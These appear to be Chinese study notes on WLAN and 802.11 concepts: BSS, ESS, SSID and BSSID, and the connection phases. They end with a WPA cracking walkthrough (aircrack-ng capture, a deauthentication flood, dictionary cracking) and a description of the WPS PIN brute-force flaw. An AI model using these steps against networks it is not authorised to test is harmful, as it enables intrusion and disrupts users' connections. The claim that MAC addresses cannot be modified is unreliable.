WLAN协议

利用射频(RF)技术通过电磁波替代双绞铜线，在空中建立通信连接，是一种无线接入协议，

无线网和有线网对比

• 连接建立方式 ：无线网需预先建立连接认证（如SSID验证），有线网通过物理线缆直连即通，无额外验证环节。
• 通信模式差异：无线网采用半双工通信（需轮流收发），有线网支持全双工（可同时双向传输）。
• 传输可靠性：无线网物理层出错概率显著高于有线网，受障碍物（如墙壁）、射频干扰等因素影响明显。
• 安全性能：无线信号易被截获（如SSID可见、数据包抓取），存在强制断连攻击可能；有线网需物理接入才能实施攻击。
• 能效与性能：无线设备因持续收发信号导致能耗较高。吞吐量方面，当前无线技术仍落后于有线网络，但正在持续改进提升。

与WiFi的关系：WiFi是WLAN标准中的具体实现技术之一。

WiFi

基于IEEE 802.11标准，是Wi-Fi联盟的商标认证，中文别称"行动热点"。实际 为高频无线电信号技术。

IEEE802.11协议

802.11标准定义了两类设备：

• 无线站(STA)：如笔记本电脑、手机等终端设备
• 无线接入点(AP)：如无线路由器，负责网络中继

通讯协议栈：

• STA与AP通信时，双方使用相同的802.11 MAC层和物理层协议

• 有线设备(如台式机)与AP通信时，使用802.3标准的MAC层和物理层

• 上层协议(TCP/IP/LLC)保持统一

• 下层协议根据连接方式不同而区分：

  • 无线连接：802.11 MAC + 802.11 PHY

  • 有线连接：802.3 MAC + 802.3 PHY

中转必要性：当STA与有线设备通信时，必须通过AP进行协议转换

SSID和BSSID

基本服务集(BSS)

• 组成模块: 基本服务集是802.11 LAN的基本组成模块，由能够互相进行无线通信的STA(Station)组成。
• 覆盖范围: 当STA移出BSS覆盖范围时，将无法与BSS内其他成员通信。例如家用WiFi中，所有连接设备组成一个BSS，离开家后设备将断开连接。
• 实际案例: 就像家庭WiFi网络，一个路由器(AP)和连接的手机、电脑等设备共同构成一个BSS。

扩展服务集(ESS)

• 组成方式: 多个采用相同SSID的BSS通过分布式系统(DS)连接形成ESS，构成更大规模的虚拟BSS。
• 无缝切换: 在商场或大型建筑中，多个AP广播相同SSID，用户在不同位置可能连接到不同AP但感知不到切换过程。
• 实际案例: 商场WiFi通常由多个AP组成ESS，用户在一楼连接AP1，到二楼自动切换至AP2，但SSID保持不变。

SSID/BSSID

• SSID本质: 即WiFi名称，是ESS的网络标识(如TP_Link1412)，同一服务集内所有STA和AP必须具有相同SSID才能通信。
• BSSID本质: 实际上是AP的MAC地址，用于区分ESS中不同的BSS，因为MAC地址固化在网卡上不可修改。
• 区分原理: 在商场WiFi中，多个AP使用相同SSID(marketing)，但各自有不同的BSSID(AP1和AP2的MAC地址不同)。

无线接入过程的三个阶段

扫描阶段:

• 主动扫描: STA在所有信道主动搜索已知SSID，耗能较高但响应快。
• 被动扫描: AP定期广播信标帧(Beacon帧)，STA接收后选择连接，耗能较低。

认证阶段:

• 通过密码认证(WEP/WPA等)或开放认证(无密码)验证STA身份。
• 认证成功后进入关联阶段。

关联阶段:

• STA发送关联请求，AP响应后建立正式连接。
• 此后STA可与AP正常收发数据帧。

认证连接与爆破

• SSID密码认证: 包括WEP、WPA/WPA2等加密方式。
• WPS认证: 通过物理按钮或PIN码快速连接。

WPA爆破：

• 准备阶段:
  • iwconfig查看无线网卡名
  • airmon-ng check kill关闭干扰进程
  • airmon-ng start wlan0启用监听模式
• 抓包阶段:
  • airodump-ng扫描WiFi列表
  • airodump-ng -c 频道 -bssid MAC -w 文件名定向抓包
  • aireplay-ng -0 50 -a AP_MAC强制客户端重连获取握手包
• 破解阶段:
  • aircrack-ng -w 字典文件 抓包文件.cap

WPS爆破：

• PIN码结构缺陷:
  • 第8位为校验位（前7位决定）
  • 实际验证分两次：前4位+后3位
• 暴力破解效率:
  • 理论组合从10^8^降低为10^4^ + 10^3^
  • 平均5500次即可破解（约2小时）